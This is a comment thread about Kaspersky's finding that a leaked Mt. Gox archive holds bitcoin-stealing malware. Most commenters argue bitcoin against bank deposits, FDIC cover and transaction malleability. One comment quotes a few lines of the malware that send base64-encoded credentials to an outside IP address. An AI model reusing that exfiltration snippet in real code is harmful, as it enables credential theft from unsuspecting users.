Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."

Really?

[SternisheFan]

Oh yes, I totally trust easily manipulated computer bits over paper money.

Re:Really?

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Re:Really?

[SternisheFan]

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

Re:Really?

[ttucker]

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

Re:Really?

[Ralph+Wiggam]

How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

When someone steals real money from a bank, it is insured by the FDIC.

The impact is way, way worse with bitcoin.

Re:Really?

[SternisheFan]

Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy'' hurdle.

Re:Really?

[bill_mcgonigle]

Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

Re:Really?

[zieroh]

Real coin has worked for thousands of years.

Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

Re:Really?

[mysidia]

Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

NOPE! And I assure you, this mode of payment is not thousands of years old.

For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones. Chances are you didn't even put in "real dollars though" ---- you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything, because they were also most likely all paid by credit card, checo or DD.

Re:Really?

[mysidia]

Bitcoin has not proven itself to be a reliable way to store money.

Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

Re:Really?

[mysidia]

no bitcoin transactions are ever reversible.

No cash transactions are ever reversible.

[And Bitcoin is a form of cash.]
There, fixed it for you.

Re:Really?

[sphealey]

- - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

Another crytocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

sPh

Re:Really?

[Kjella]

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

That's generally false for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to cease. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

Re:Really?

[mysidia]

When someone steals real money from a bank, it is insured by the FDIC.

Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

WP has some other examples of items not insured by the FDIC, also not covered:

Investments backed by the U.S. government, such as US Treasury securities

The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.
Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

Insurance and annuity products, such as life, auto and homeowner's insurance.

Re:Really?

[mbkennel]

| Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

Fiat currency is not "by fiat" automatically exchangable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

Bitcoin isn't by fiat exchangable for anything either---it only has constructed scarcity.

| The fed and the banks just will "federal reserve" monopoly bucks into existence.

Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.

Re:Really?

[QilessQi]

As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

Re:Really?

[QilessQi]

And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

Re: Really?

[Gunboat_Diplomat]

Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

Re:Really?

[TubeSteak]

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

Re:Really?

[ahabswhale]

lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bicoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

Re: Really?

[mlts]

BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

Re:Really?

[ras]

As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result.

Your understanding is wrong. The mtgox fiasco didn't occur because the miners accepted malleable transactions. It happened when the miners stopped accepting transactions that were malleable. Well, not all malleable transactions. But they did stop accepting the invalid transactions mtgox was generating. Generating those invalid transactions was mtgox bug 1. Mtgox bug 2 was when people fixed their bad formatting and they were accepted the block chain, mtgox software didn't recognise them. Mtgox bug 3 was they they then repeated the same transaction without doing a full audit of their ledger to verify some other mistake hadn't been made. Doing it twice is a bit of a risk given bitcoin transactions aren't reversible. But to be fair, mtgox said they authorised such double spends manually.

But ... it is almost inconceivable that a human authorised $350M in double spends without getting suspicious. So that brings us to the unknown mtgox bug 4. Somehow, they managed to figure out a way of authorising $350M in double spends without anybody noticing. Surely this must quality for the Guinness Book of Records greatest accounting cluster fuck of all time.

But bitcoin protocol bug - sorry no, not this time. Bitcoin offers very few guarantees. I guess a known mining rate, whatever appears on the audit trail is the one and only correct history of bitcoin, and that history will never change are the main three. In the early days, back when people sent 1000's of bitcoins to pay for a pizza, there were bugs that in the bitcoin software that meant those guarantees weren't upheld. But it was also a nicer time. It was when bitcoin was just a toy friends played with, so such mistakes could be and were always fixed. No bitcoin has every been permanently lost because because of such bugs.

I know I shouldn't care when a person on the internet is wrong. Not just a little bit wrong, but tinfoil hat type wrong as you are in this case. But seeing tinfoil hat comments being modded up to +5 is difficult to swallow silently.

Re:Really?

[ras]

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

Only for some definition of "totally" that does mean 100% of transactions. And when you get to the the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

From http://www.globalgrainsvn.com/GGS/MT103.html:

SWIFT MT-103

SWIFT MT-103s are the most commonly used form of SWIFT communication, and one which many people will have utilized without even knowing it. For most bank customers, they are known not as MT-103s at all, but rather as wire transfers, telegraphic transfers, or SWIFT transfers. A SWIFT MT-103 is used by the bank when its customers wish to make payment to customers of another bank in another country.

How Do I Send A MT-103 ?

An MT-103 is the most commonly utilized type of SWIFT message. In order to send one, simply contact your bank and let them know that you would like to send a telegraphic or wire transfer. They will require the recipient’s bank details, and also the SWIFT code of the recipient’s bank. If the recipient is not aware of their bank’s SWIFT code, it is a fairly simple matter for the recipient to inquire at their bank.

Are MT-103s Reversible?

No. Once a MT-103 has been made, it is not reversible. Sending a MT-103 is the equivalent of handing someone cash in many respects, so due care should be taken when initiating a MT-103.

Re:Really?

[ttucker]

This is totally false. Almost all bank transactions are reversible in the case of fraud

A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

Sure, I will help them figure out how to hire a lawyer. Or you can pass the message along.

Re:Really?

[QilessQi]

Not so fast, Ras. I said that transaction malleability was exploited by hackers; it was. My only error was confusing the Mt.Gox incident with the Silk Road 2 incident. Here, from the very first paragraph of this Tech Crunch article ( http://techcrunch.com/2014/02/... )

Silk Road 2 moderator Defcon reported in a forum post that hackers have used a transaction malleability exploit to hack the marketplace. The hackers stole over 88,000 4474.26 bitcoins worth $2,747,000, emptying the site’s escrow account.

The site used a central escrow service to send bitcoins from buyers to sellers. The hackers exploited the transaction malleability bug – essentially a way users can mask transfers and ask for the same amount of BTC multiple times – to clean out this wallet. This is the same bug that forced Mt. Gox to halt all withdrawals and recent updates have made average bitcoin wallets secure against this sort of attack. According to the site, hackers used the Silk Road’s automatic transaction verification system to order from each other and then request refunds for unshipped goods. Hackers were able to use the transaction malleability bug because the Silk Road used only transaction ID to confirm the transfer of bitcoins. You can read more about the problem here.

The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited. I think I can be forgiven for having confused one multimillion dollar Bitcoin loss with another caused by the same underlying problem. :-)

But Mt.Gox and Silk Road 2 and every other incident is immaterial when taken individually. As I said in my post, let's leave that aside for a minute and focus on the real issue. I have seen people tying themselves in knots to defend Bitcoin exactly-as-is when that energy would be far better spent acknowledging the weakness in the ecosystem and laying out clear plans to eradicate them. Your own reply speaks about the Mt.Gox fiasco as if losing 350M to incompetence is somehow better than losing it to a targeted attack. The longer people deny the existence of these problems with the existing ecosystem, the longer it will take for cryptocurrencies to find a firm footing in the world. Which I think is a shame.

Finally, as for your "tinfoil hat" comment.... save the name-calling for the conspiracy theorists, of which I am not one. I have only said what many have said already, that Bitcoin is not yet ready for adoption by the masses. It currently, currently, lacks the necessary economic infrastructure to be used safely and effectively by the public. I don't know why that easily-supported statement bruises so many feelings.

Re: Really?

[conquistadorst]

Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

Except nobody's paper wallet is connected to the internet, and few people carry significant hordes of cash in their wallet anyway so this isn't really a fantastic comparison. Yes, one could say, "well you can move it offgrid" then you can also do the same thing with your wallet and toss it in a safe or bank security box, only then would they become equals?

That being said, your wallet is anything but a "safe" place but I'd still say a networked computer is worse. Bitcoins on a networked computer would be probably be akin to someone leaving their cash in a safe, unattended, in an inconspicuous, publicly accessible place.

Re:Really?

[ras]

I said that transaction malleability was exploited by hackers; it was.

I thought I was pretty clear when I said it wasn't.

The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited.

Again no, as far as I know it was never exploited. But I can see you prefer to believe an internet echo chamber confirming your world views over me over me, who is saying you are just plain wrong. More on the dangers of doing that later. For now I assume you really are willing to discard your tin foil hat if you understood what happened. Unfortunately that is going to require going into some detail.

The transaction malleability problem we are discussing here is actually about how the transaction signature is represented. As I said, there are other causes of malleability, some of which haven't been fixed. The transaction signature is particularly important because the bitcoin protocol uses it to identify the transaction. When used in that manner the same piece of information is called a transaction id. Because it does uniquely identify a transaction once it is accepted into the block chain bitcoin exchanges sometimes use the transaction id to match for transactions they have generated.

The different ways of representing a transaction id doesn't effect the core operators of bitcoin, so it was never regarded as serious. The reason it didn't effect bitcoin is two otherwise identical transactions with different transaction id's look like a double spend. Naturally the bitcoin protocol rejects all but the first attempt, so it doesn't matter how many different transaction id's you throw at it. Bitcoin is based on the premise that there is one and only one true and correct transaction history – and that is the block chain. You can throw any rubbish you like at it (and there have been many attempts at DDOS it by doing just that), but as far as bitcoin is concerned the only transactions that exist are the ones that get appended to the block chain. So if there are transactions with multiple id's, it is the id that gets into the block chain that is the official one. The rest never happened.

So far I expect this matches your understanding of the root cause of the problem. It is about now we depart from that.

The transaction signature / id is a ECDSA signature. Here is a real one: 770a723381d3edbcbfd06cecdd7b9f8569e9691d3a06a8a9c8972dd6fcbc8493 . It looks remarkably like a fixed length SHA checksum doesn't it? It's not. An ECDSA signature is two large numbers, which in bitcoin is encoded in DER format. DER format is used because, quoting from that Wikipedia link: “DER is a subset of BER providing for exactly one way to encode an ASN.1 value the shortest possible length encoding must be used”. Which sort of begs the question “how it be malleable”? It isn't. But, the software the reference bitcoin software uses to produce and decode these signatures is openssl, and like all good internet software openssl follows Postel's Law: “"Be liberal in what you accept, and conservative in what you send”. So OpenSSL always generates valid bitcoin signatures, but it accepts invalid ones, and in particular numbers with leading zeros. Whether you call this a bug or feature is more a matter of taste than anything else.

This bug / feature was noticed by the bitcoin developers some 3 years ago. It wasn't viewed as serious. As I said, it doesn'

This just gets better and better

[VTBlue]

This becoming comical to the point of absurdity.

Slowpoking hard, aren't we?

[gustgr]

This was known minutes after the leak was released. You disappoint me, slashdot.

Leak

[gustgr]

The leak is real, nonetheless. I found my balance and transactions there.

Re:Leak

[WinstonWolfIT]

The data is publicly available.

Re:Leak

[Kjella]

Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

Old news.

[Janek+Kozicki]

Coindesk already wrote about that almost two weeks ago!

Re:Old news.

[rmdingler]

We're like the Supreme Court here, Janek.

If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

Re:Censored content revealed

[mythosaz]

I'm mostly amused by the User-Agent:

      set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
      libURLSetSSLVerification false
      post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"

Re: Really???

[rmdingler]

Mt Gox, thee top exchange for turning bitcoins into coin of the realm,

turned out to be a house of phosphorous cards,

and you don't see a red flag waving?

Was your retirement locked up in there and now you find yourself too poor to pay attention?

Not from the customer's point of view

[Camael]

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

Different forms, same effect

[Camael]

There is zero counterfeit bitcoin. You can't say the same about paper currency.

Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

But can transactions involving bitcoins be counterfeited? Most certainly!

Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

Andreas M. Antonopoulos, chief security officer of digital wallet developer Blockchain, said the attacks work by flooding exchanges with a large number of malformed transactions that are similar, but not identical, to legitimate transactions that were already made. Exchanges that trust one or more of the fake records instead of the entries in the official Bitcoin blockchain quickly fall out of sync with the rest of the network and must recalculate their fund balances once the mistakes become apparent.

The net effect is the same. Counterfeit paper currency deprives its holders of the value of that currency. Counterfeit bitcoin transactions deprive the owners of the bitcoins involved in that transaction of the value of those bitcoins.